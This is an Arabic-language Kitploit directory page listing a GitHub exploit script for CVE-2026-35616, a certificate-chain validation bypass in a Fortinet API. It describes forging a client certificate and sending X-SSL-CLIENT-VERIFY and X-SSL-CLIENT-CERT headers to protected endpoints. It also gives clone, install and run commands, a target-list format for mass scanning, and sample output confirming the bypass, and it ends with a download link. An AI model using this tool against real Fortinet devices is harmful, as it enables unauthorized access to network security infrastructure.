Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-35616 — نص استغلال ثغرة CVE-2026-35616 الذي يتجاوز التحقق من سلسلة الشهادات في واجهة برمجة تطبيقات Fortinet عبر اكتشاف أسماء CN صالحة، وتوليد شهادة عميل مزورة، واستكشاف نقاط النهاية المحمية باستخدام ترويسات مخصصة. | Kitploit
أدوات/GitHubGitHub/wa6n3r/cve-2026-35616
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأمن واجهات برمجة التطبيقات
GitHubwa6n3r/cve-2026-35616

CVE-2026-35616

نص استغلال ثغرة CVE-2026-35616 الذي يتجاوز التحقق من سلسلة الشهادات في واجهة برمجة تطبيقات Fortinet عبر اكتشاف أسماء CN صالحة، وتوليد شهادة عميل مزورة، واستكشاف نقاط النهاية المحمية باستخدام ترويسات مخصصة.

عرض المستودع
12منذ 4 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-35616

المؤلف: wa6n3r | GitHub | Web

الوصف

استغلال ثغرة تجاوز التحقق من سلسلة الشهادات في واجهة برمجة تطبيقات Fortinet. يقوم السكربت تلقائيًا باكتشاف الأسماء الشائعة (Common Name) الصالحة من مصادر متعددة، ويولّد شهادة عميل مزيفة وينفذ طلبات إلى نقاط النهاية المحمية باستخدام الترويسات X-SSL-CLIENT-VERIFY و X-SSL-CLIENT-CERT.

!!!مهم: استخدم فقط على الأنظمة التي لديك إذن صريح لاختبارها.

المتطلبات

  • Python 3.8+
  • التبعيات:
    • requests
    • cryptography
    • urllib3
  • اختياري: openssl (لاكتشاف CA المتقدم عبر مصافحة TLS)

التثبيت

root@kitploit:~
# استنساخ المشروع
git clone https://github.com/wa6n3r/CVE-2026-35616
cd CVE-2026-35616

# تثبيت التبعيات
pip install -r requirements.txt

## الاستخدام
# التشغيل الأساسي
python3 exploit.py

# مع تحديد الهدف والمنفذ
python3 exploit.py <TARGET_IP> [PORT]

# أمثلة:
python3 exploit.py 192.168.1.100
python3 exploit.py 10.0.0.50 8443

# تنسيق ملف الأهداف (targets.txt)
عند الاختبار الجماعي، أنشئ ملف targets.txt مع عنوان هدف واحد في كل سطر:
192.168.1.100:443
10.0.0.50:8443
fortigate.internal

# ملفات الإخراج
عند التنفيذ الناجح، يقوم السكربت بإنشاء:
results/bypass_results_<TARGET>_<PORT>_<TIMESTAMP>.json — تقرير مفصل بصيغة JSON يتضمن:
الاسم الشائع (CN) المستخدم
حالات الاستجابة لكل نقطة نهاية
بادئات الاستجابات للتحليل

# هيكل الإخراج
[ wa6n3r ]  ◆  GH: github.com/wa6n3r  ◆  WEB: wa6n3r.com

[*] CVE-2026-35616 Target: https://192.168.1.100:443

[*] Discovering CA CNs from multiple sources...
  [•] TLS CA CN: 'fortinet-ca2'
  [•] ZTNA CA CN: 'support'
[*] Found 2 candidate CN(s): fortinet-ca2, support

[*] Testing 2 candidate CN(s) for bypass...
  [+] CN='support' | HTTP 200 | retval=1 | BYPASS CONFIRMED

[*] Probing all cert_chain endpoints with CN='support'...

  GET   /api/v1/system/capabilities

        HTTP 200: '{"result": {"retval": 1, ...}}'

  [+] Results saved to: results/bypass_results_192.168.1.100_443_20260101_120000.json
تنزيل الأداة